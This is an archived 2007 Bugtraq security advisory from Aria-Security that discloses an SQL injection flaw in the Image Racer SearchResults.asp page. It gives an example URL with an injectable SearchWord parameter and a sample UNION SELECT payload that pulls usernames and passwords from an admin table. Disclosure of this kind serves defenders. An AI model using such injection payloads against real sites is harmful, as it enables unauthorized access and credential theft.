[Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.
From: Advisory@xxxxxxxxxxxxxxxxx
Date: 22 Jul 2007 23:42:46 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

__________________

Aria-Security Team
__________________

Image Racer SearchResults.asp SQL Injection
Vendor: http://www.junctionquest.com/Software.asp

Example:
http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL 
COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0

Example :
-1 'union select username,password from admin where [FIND IT YOUR SELF]=1

------------------------------------------------
Credits: Aria-Security Team 
http://aria-security.net/
Personal Blog: http://outlaw.aria-security.info

Prev by Date: Re: PHMe CMS 0.0.2 local File Include Vulnerabilitiy
Next by Date: Re: Re: Internet Explorer 0day exploit
Previous by thread: n.runs-SA-2007.021 - Norman Antivirus LZH parsing Arbitrary Code Execution Advisory
Next by thread: Webspell 4.x Local File Inclusion
Index(es):
- Date
- Thread